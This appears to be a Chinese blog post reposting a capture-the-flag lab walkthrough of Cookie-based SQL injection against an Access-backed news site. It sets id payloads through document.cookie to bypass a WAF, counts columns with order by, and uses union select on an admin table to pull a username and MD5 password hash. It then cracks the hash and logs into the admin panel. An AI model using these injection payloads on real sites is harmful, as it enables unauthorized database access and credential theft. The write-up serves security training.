阅读 60

封神台-Access注入之Cookie注入

Access注入之Cookie注入

我们进入新闻页面,随便点击一条新闻进入

我们通过测试发现URL传参是有检测的,有WAF进行拦截,于是我们换一种思路,测试一下Cookie注入

我们通过测试Cookie传参id值

判断注入存在

设置Cookie:
document.cookie="id="+escape("171")

访问网址:
http://kypt8004.ia.aqlab.cn/shownews.asp

页面返回的是id=171的页面,可以证明id传参是有效的,可能存在Cookie注入

继续测试证明注入存在:
document.cookie="id="+escape("171 and 1=1") #页面正常
document.cookie="id="+escape("171 and 1=2") #页面异常

判断字段数

document.cookie="id="+escape("171 order by 10") #页面正常
document.cookie="id="+escape("171 order by 11") #页面异常

得出字段数为10

判断显错点

这里有一点需要注意的是Access数据库与MySQL数据库不同
  Access数据库进行查询时必须填写正确的表名才能查询
  
document.cookie="id="+escape("171 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin")

得出显错点为2,3位

查询数据

document.cookie="id="+escape("171 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin")

得出username=admin&password=b9a2a2b5dffb918c

我们注意到这个password是个md5值,于是我们去解密以下
得到密码为:welcome

于是我们去登陆网站后台

后台地址:http://kypt8004.ia.aqlab.cn/admin/Login.asp

登陆后得到最终flag为:zkz{welcome-control}

原文:https://www.cnblogs.com/gaojia-hackerone/p/15226822.html

文章分类
代码人生
版权声明:本站是系统测试站点,无实际运营。本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 XXXXXXo@163.com 举报,一经查实,本站将立刻删除。
相关推荐